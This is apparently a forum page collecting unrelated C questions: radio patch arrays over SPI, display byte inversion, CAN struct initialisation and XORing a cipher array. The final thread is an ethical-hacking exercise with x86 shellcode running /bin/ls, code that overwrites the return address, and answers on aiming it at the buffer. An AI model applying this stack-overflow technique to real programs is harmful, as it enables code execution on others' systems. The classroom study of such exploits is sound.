Related
Initializing a SI labs radio, the software develops a header file as well as a patch file. first part is, depending on the patch file it outputs different ways. here is a snippet of each patch:
Rev B patch:
#define SI446X_PATCH_CMDS \
{ 0x04,0x11,0xF7,0x76,0x00,0x00,0xA6,0x82 }, \
{ 0x05,0x61,0xE6,0x82,0x5E,0xB7,0xFB,0x93 }, \
{ 0x05,0x1E,0x12,0xBD,0x5A,0xC2,0x52,0x41 }, \
{ 0xE7,0xF4,0xDF,0x6A,0x24,0xD9,0xBA,0x31 }, \
OR
Rev C patch:
#define SI446X_PATCH_CMDS \
0x08,0x04,0x21,0x71,0x4B,0x00,0x00,0xDC,0x95, \
0x08,0x05,0xA6,0x22,0x21,0xF0,0x41,0x5B,0x26, \
0x08,0xE2,0x2F,0x1C,0xBB,0x0A,0xA8,0x94,0x28, \
0x08,0x05,0x87,0x67,0xE2,0x58,0x1A,0x07,0x5B, \
Now this will be hardcoded into the software and either one commented out. but it must have been done this way for a reason and i dont understand it. for initial testing i placed each line of 8 bytes (as it needs to be pushed over SPI this way) into an array and then created a pointer to the array since the length isnt necessary as they are all 8 bytes like i said. iss there a more intelligent way i should cade this based on the way it is presented?
uint8_t array_1[8] = { 0x04, 0x11, 0xF7, 0x76, 0x00, 0x00, 0xA6, 0x82 };
uint8_t array_2[8] = { 0x05, 0x61, 0xE6, 0x82, 0x5E, 0xB7, 0xFB, 0x93 };
uint8_t *theArrays[] = { array_1, array_2, array_3, array_4, array_5, array_6,
array_7, array_8, array_9, array_10, array_11, array_12, array_13,
I then program the SPI using this code and manually typed in the qty into a for loop as i cant get sizeof from the pointer array.
HAL_SPI_Transmit(&hspi1, theArrays[i], 8, 50);
These macros just make things a bit easier.
Assuming the number of (sub)arrays in both macros matches the number of arrays in your array of pointers, your code would look like this in full version:
uint8_t array_1[8] = { 0x04, 0x11, 0xF7, 0x76, 0x00, 0x00, 0xA6, 0x82 };
uint8_t array_2[8] = { 0x05, 0x61, 0xE6, 0x82, 0x5E, 0xB7, 0xFB, 0x93 };
uint8_t array_3[8] = ...
uint8_t array_4[8] = ...
uint8_t array_...
uint8_t array_12[8] = ...
uint8_t array_13[8] = ...
uint8_t *theArrays[] = { array_1, array_2, array_3, array_4, array_5, array_6,
array_7, array_8, array_9, array_10, array_11, array_12, array_13,
...
HAL_SPI_Transmit(&hspi1, theArrays[i], 8, 50);
With these macros (stored in some nice header) you can just do this:
Revision B:
#define SPI_MESSAGE_SIZE 8
const uint8_t theArray[][SPI_MESSAGE_SIZE] = {SI446X_PATCH_CMDS};
_Static_assert(sizeof theArray/sizeof *theArray == SOME_EXPECTED_SIZE, "SI446X_PATCH_CMDS corrupt");
...
HAL_SPI_Transmit(&hspi1, theArrays[i], SPI_MESSAGE_SIZE, 50);
or in case of Revision C
#define SPI_MESSAGE_SIZE 8
const uint8_t theArray[] = {SI446X_PATCH_CMDS};
_Static_assert(sizeof theArray/sizeof *theArray == SOME_EXPECTED_SIZE, "SI446X_PATCH_CMDS corrupt");
...
// For Rev C, the array contains a <length> byte before the SPI data.
// Adjust addressing accordingly
uint8_t len = theArrays[i*(SPI_MESSAGE_SIZE+1)];
HAL_SPI_Transmit(&hspi1, &theArrays[i*(SPI_MESSAGE_SIZE+1)+1], len, 50);
The static assert was suggested by Lundin. I am not aware of the correct value to compare but there should be some useful define somewhere in Silabs Radio's headers.
it seems this code make my display go crazy sometimes (but only sometimes). But when I remove dat=~dat; it seems to work fine.
why?
what I am trying to do here is just make the ascii letters be the oposite: so for example:
11001000 will be:
00110111
or
10101111 would be:
01010000
the reason for doing this is that i want to have one row (the active row) in the diplay window with black on white pixels instead of opostie like the rest of the display window.
Is there some other way I could do this? (invert the numbers)
FYI: I am programing in C. Atmel studio. atmega 4809, SSD1305z display, SPI-simular interface.
void displayinvertedString(char str[], uint8_t ypos,uint8_t xpos)
{
Set_Page_Address(ypos);
Set_Column_Address(xpos);
int len = strlen(str);
uint8_t dat;
int temp;
for (int e=0; e<len; e++)
{
dat = 0xff;
Write_Data(dat); //to get an extra space between the
// numbers/letters for
//making it easier to read the text on the display
temp = str[e];
temp=temp-0x20; // As the lookup table starts from Space(0x20)
for (int w=0; w<5; w++)
{
dat= OledFontTable[temp][w]; // Get the data to be displayed for LookUptable
dat =~ dat;
Write_Data(dat);
}
}
}
----------
static uint8_t OledFontTable[][FONT_SIZE]={
//static uint8_t OledFontTable[] = {
0x00, 0x00, 0x00, 0x00, 0x00, // space
0x00, 0x00, 0x2f, 0x00, 0x00, // !
0x00, 0x07, 0x00, 0x07, 0x00, // "
0x14, 0x7f, 0x14, 0x7f, 0x14, // #
0x24, 0x2a, 0x7f, 0x2a, 0x12, // $
0x23, 0x13, 0x08, 0x64, 0x62, // %
0x36, 0x49, 0x55, 0x22, 0x50, // &
ETC. Etc.
just more raw pixel data here. this part ends like this:
0x00, 0x00, 0xFF, 0x00, 0x00, // |
0x00, 0x82, 0x7C, 0x10, 0x00, // }
0x00, 0x06, 0x09, 0x09, 0x06 // ~ (Degrees)
};
void Write_Data(unsigned char Data)
{
PORTA.OUTCLR = PIN7_bm; //cs
PORTB.OUTSET = PIN2_bm; //dc
Write_Command(Data); //
}
void Write_Command(unsigned char data)
{
SPI0.DATA = data; // copy data to DATA register
while ((SPI0.INTFLAGS & SPI_RXCIF_bm) == 0) ; //wait
}
I have asked a bit about this before. but i thought i would look "cleaner" with a new tread since info was missing from the last one.
It turned out I needed to toggle the chip select (CS) so the clock did not get out of sync with time.
The clock sync drifted with time.
It was going crazy faster for the non inverted data for some reason. But with the normal data it happend after some time also.
Thank you for the answers.
I have a structure as follows
typedef struct s_CanMsg
{
uint32_t id;
uint16_t timestamp;
uint8_t data[8];
uint8_t dlc;
bool_t isExtended;
bool_t isRemote;
} s_CanMsg_t;
and I have a structure variable as follows
s_CanMsg_t CANEraseResponse;
Now I am trying to pass an array to the data member of the structure variable as follows:
CANEraseResponse.data[8] = {0x00, 0xFF, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00};
This is showing syntax error and how can I pass the data to the structure variable with array member? Thanks in advance.
You can initialize the whole structure when you define the variable:
s_CanMsg_t CANEraseResponse = {
some_value_for_id,
some_value_for_timestamp,
{0x00, 0xFF, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00},
some_value_for_dlc,
some_value_for_isExtended,
some_value_for_isRemote
};
You can also use a designator to explicitly initialize only the array member;
s_CanMsg_t CANEraseResponse = {
.data = {0x00, 0xFF, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00}
};
Then all other members will be initialized to zero.
And of course you can define a temporary array and copy into the structure array:
static uint8_t data[8] = {0x00, 0xFF, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00},
s_CanMsg_t CANEraseResponse;
memcpy(CANEraseResponse.data, data, sizeof data);
Lastly, if none of the ways above are acceptable, then the only remaining solution is to explicitly assign to each element of the array:
CANEraseResponse.data[0] = 0x00;
CANEraseResponse.data[1] = 0xFF;
CANEraseResponse.data[2] = 0x00;
CANEraseResponse.data[3] = 0x04;
CANEraseResponse.data[4] = 0x02;
CANEraseResponse.data[5] = 0x00;
CANEraseResponse.data[6] = 0x00;
CANEraseResponse.data[7] = 0x00;
The notation you are using can only be used to initialize an array. Once you declare your struct variable, you have moved past initialization. You can, however, do it with something called a "designated initializer" like so:
s_CanMsg_t CANEraseResponse = {.data= {0x00, 0xFF, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00}};
CANEraseResponse.data[8] refers to the 9th element of the data member (as the array is zero based. Try removing the [8].
Edit/Clarification: removing the [8] will not solve your issue, but you should be aware that CANEraseResponse.data[8] points to a position outside of the data array.
You can't assign arrays directly in C. As well as the initialization techniques shown in other answers, you could use a compound literal and memmove() (or memcpy()):
memmove(CANEraseResponse.data, (uint8_t[]){ 0x00, 0xFF, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00 }, sizeof(CANEraseResponse.data));
This question already has answers here:
How to make bit wise XOR in C
(7 answers)
Closed 5 years ago.
I am trying to implement a cryptographic algorithm in C. I have an unsigned char array;
unsigned char ciphertext[] = { 0xA5, 0xB2, 0x3C, 0xAB, 0x03, 0xF1, 0xD3, 0x1C, 0x7F, 0xAD, 0x37, 0xA8, 0x8C, 0x8B, 0xCD, 0x90, 0xD4, 0xC2, 0x30, 0xAB, 0xD2, 0x3F, 0x3D, 0xAF, 0x58, 0x94, 0x1F, 0x50, 0xAF, 0xA2, 0xCE, 0x01 };
I need to XOR the char array with all values from 1 to 256. How can I do it in C? Thank you in advance.
EDİT:
I want to XOR my char array with;
unsigned char [] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01};
unsigned char two = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02};
unsigned char three[] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03};
And so on... That is the reason why I can not xor through each elements. It would be something different.
Something like:
int i;
for (i = 0; i < length; i++) {
cryptotext[i] = ciphertext[i] ^ (i%256);
}
Note that you can use only one array if you don't want to keep you plain text:
ciphertext[i] ^= (i%256);
XOR performs the following operations. please see below.
x y XOR
------------
0 0 0
1 0 1
0 1 1
1 1 0
You can't xor the entire array in one piece. you need to loop through the array and transform it character by character.
perform loop through the array and perform the XOR Operation.
I'm an ethical hacking student and have been given this as an exercise. I've been stuck on it for two days now.
We're writing a program that is purposely vulnerable to a "buffer overflow".
#include <stdio.h>
void badf(int n, char c, char* buffer)
{
char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff,
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c,
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes
int i;
// Copy mycode array into buffer array
for (i=0; i<n; i++)
{
buffer[i]=mycode[i];
}
// Overwrite Base Pointer
buffer[37] = 0x00;
buffer[38] = 0x00;
buffer[39] = 0x00;
buffer[40] = 0x00;
// Overwrite Instruction Pointer
buffer[41] = 0x90;
buffer[42] = 0x83;
buffer[43] = 0x04;
buffer[44] = 0x08;
}
void f(int n, char c)
{
char buffer[37];
badf(n,c,buffer);
}
void test()
{
printf("test\n");
}
int main()
{
f(37,0x00);
return 0;
}
The mycode array contains "malicious" machine code (it actually just calls execv with /bin/ls). badf is the "vulnerable" function. At the moment you can see I'm overwriting the Base Pointer with 0x00s and the Instuction Pointer with 0x08048390 which is the address of the test() function. This works, 'test' is printed to the terminal.
Now my next exercise is to "use ddd to find the address of your code array and modify the C to write this address over the instruction pointer, as you did in the previous step".
What I don't understand, is how I can use ddd to find the address of my code array. I can easily find the address where the array is moved to BP:
0x08048260 <badf+12>: movb $0xeb,-0x29(%ebp)
0x08048264 <badf+16>: movb $0xf,-0x28(%ebp)
0x08048268 <badf+20>: movb $0xb8,-0x27(%ebp)
.....
Or where it is copied into the buffer array:
0x080482f4 <badf+160>: movl $0x0,-0x4(%ebp)
0x080482fb <badf+167>: jmp 0x8048316 <badf+194>
0x080482fd <badf+169>: mov -0x4(%ebp),%edx
0x08048300 <badf+172>: mov 0x10(%ebp),%eax
.....
But of course this is not what we're looking for.
How can I find the Instruction Pointer address to execute machine code that has been loaded in by writing it in the buffer array this way?
edit: ddd is the debugger we're using, also note we're working with a 32bit linux. The code is compiled with -fno-stack-operator flag, disabling the compilers auto-checks for buffer overflows.
Since you copy myCode into the buffer, you could simply use buffer itself:
Assuming a little-endian machine:
// Overwrite Instruction Pointer
buffer[41] = (char)(((uintptr_t)buffer) >> 0);
buffer[42] = (char)(((uintptr_t)buffer) >> 8);
buffer[43] = (char)(((uintptr_t)buffer) >> 16);
buffer[44] = (char)(((uintptr_t)buffer) >> 24);
I don't know how to do it with ddd, but you could modify badf to print mycode address by using a print statement like this:
printf("mycode address: %p", (void *) mycode);
See what that prints, and just write that to instruction pointer